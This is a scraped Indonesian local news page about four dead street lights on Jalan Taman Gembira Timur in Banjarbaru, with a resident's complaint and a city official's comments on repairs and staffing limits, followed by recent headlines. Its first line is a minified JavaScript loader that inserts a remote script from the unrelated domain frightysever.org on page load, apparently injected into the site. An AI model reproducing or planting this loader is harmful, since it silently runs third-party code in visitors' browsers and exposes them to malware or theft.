(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

PJU Mati di Jalan Taman Gembira Timur, Gelap Gulita Bahayakan Pelintas


KANALKALIMANTAN.COM, BANJARBARU – Empat lampu Penerangan Jalan Umum (PJU) di Jalan Taman Gembira Timur, Kelurahan Guntung Paikat, didapati mati total beberapa hari terakhir.

Pengendara dan pelintas jalan harus berhati-hati ketika melewati jalan tersebut
Selain di jalan tersebut dari pantauan kanalkalimantan.com pada Rabu (3/11/2021) malam, ada beberapa titik PJU yang tidak menyala, bahkan menjadi daerah rawan kecelakaan.

Seperti PJU di samping Balai Kota Banjarbaru atau pertigaan depan Dinas Perdagangan Kota Banjarbaru dan Jalan A Yani Km 20 hingga Km 22 Kelurahan Landasan Ulin Barat.

Salah seorang warga Guntung Paikat, Ahmad mengatakan, lampu samping lapangan tenis Idaman itu sudah padam semenjak hujan lebat kemarin. Saat malam hari kondisi jalan gelap gulita, ditambah rimbunnya pepohonan yang ada di pinggir jalan.

 

Kepala Bidang PJU, Pertamanan dan Permakaman, Sartono. Foto : ibnu

Baca juga :Vanessa dan Suami Tewas Tabrakan Maut

“Sudah beberapa hari mati semenjak hujan lebat kemarin,” ujarnya.

Ahmad berharap kepada pemerintah kota, secepatnya memperbaiki PJU yang tidak berfungsi itu. Supaya pengguna jalan bisa nyaman dan aman saat melewati jalan tersebut.

Kepala Bidang PJU, Pertamanan dan Permakaman Dinas Perumahan dan Pemukiman Kota Banjarbaru, Sartono mengatakan, kurang lebih ada 8.600 titik PJU tersebar di seluruh Kota Banjarbaru, padamnya lampu PJU memang acap kali terjadi.

Pihaknya tidak menampik banyak menerima keluhan terutama dari pengguna jalan dikarenakan kondisi jalan yang gelap dan sering menimbulkan kecelakaan lalu lintas.

 

Baca juga : Dishub Barsel Siapkan Anggaran Penyediaan 100 Rambu Lalin di 2022

“Kalau ada PJU yang mati berdasarkan pengaduan dan patroli tim, langsung kami terjun ke lapangan untuk memperbaiki,” tegasnya.

Bidang PJU Disperkim mengharapkan peran aktif masyarakat untuk melaporkan apabila ada lampu PJU mati maupun rusak.

“Bisa lewat aplikasi Lapor Diskominfo Banjarbaru atau lewat Call Center Disperkim Banjarbaru, bisa langsung melakukan pengaduan ke kantor Disperkim Kota Banjarbaru,” katanya.

Disperkim Banjarbaru siap melakukan pemeliharaan dan perawatan serta penambahan penerangan jalan umum di beberapa titik di Kota Banjarbaru.

 

Baca juga : Tangkapan 4 Kg Sabu Sindikat Narkoba di Kalsel, BNNP Kalsel: Ada Jaringan Libatkan Napi Lapas Karang Intan

“Kita saat ini masih terkendala dengan jumlah personel, untuk perbaikan akan kita maksimalkan dengan anggota yang ada dan dengan perlengkapan yang tersedia di sini,” bebernya.

Ada beberapa titik wilayah di Kota Banjarbaru ketika sudah memasuki pukul 21.00 Wita akan dilakukan pemadaman PJU.

“Karena masih PPKM di lapangan Murjani, Taman Air Mancur dan Taman Bougenville kita padamkan 21.00 Wita, sisanya menyala normal seperti di Jalan Panglima Batur kami kembalikan seperti semula,” tutupnya. (kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : bie


Desy Arfianty

Recent Posts

Sempat Sengat Pelajar Madrasah, Sarang Tawon Dalam Kelas Dievakuasi Damkar HSU

KANALKALIMANTAN.COM, AMUNTAI - Khawatir membahayakan para pelajar, sarang tawon berukuran sedang berhasil dievakuasi petugas Pemadam… Read More

2 jam ago

Peningkatan Kapasitas Anggota BPD, Ini Kata Pj Bupati HSU

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan menilai penting peranan… Read More

2 jam ago

Dua Raperda Disahkan, Ketua DPRD: Payung Hukum yang Jelas Bagi Cagar Budaya di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dua buah Rancangan Peraturan Daerah (Raperda) Kota Banjarbaru disahkan dalam rapat paripurna… Read More

5 jam ago

Ibu Ruli Terima Kursi Roda Bantuan Polsek Banjarbaru Utara

KANALKALIMANTAN.COM, BANJARBARU - Bentuk kepedulian terhadap masyarakat, Unit Binmas Polsek Banjarbaru Utara memberikan bantuan sebuah… Read More

7 jam ago

Ini Alasan Pemko Banjarbaru Larang Peternakan Babi Ada di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Aktivitas peternakan babi di Kota Banjarbaru kembali menjadi sorotan. Selain dikeluhkan atas… Read More

9 jam ago

Habisi Nyawa Sesama Sopir di Banjarmasin, ARM Ditangkap di Kandangan

KANALKALIMANTAN.COM.COM, BANJARMASIN - Kepolisian Reskrim Polsek Banjarmasin Barat dan tim gabungan berhasil menangkap ARM (21),… Read More

10 jam ago

This website uses cookies.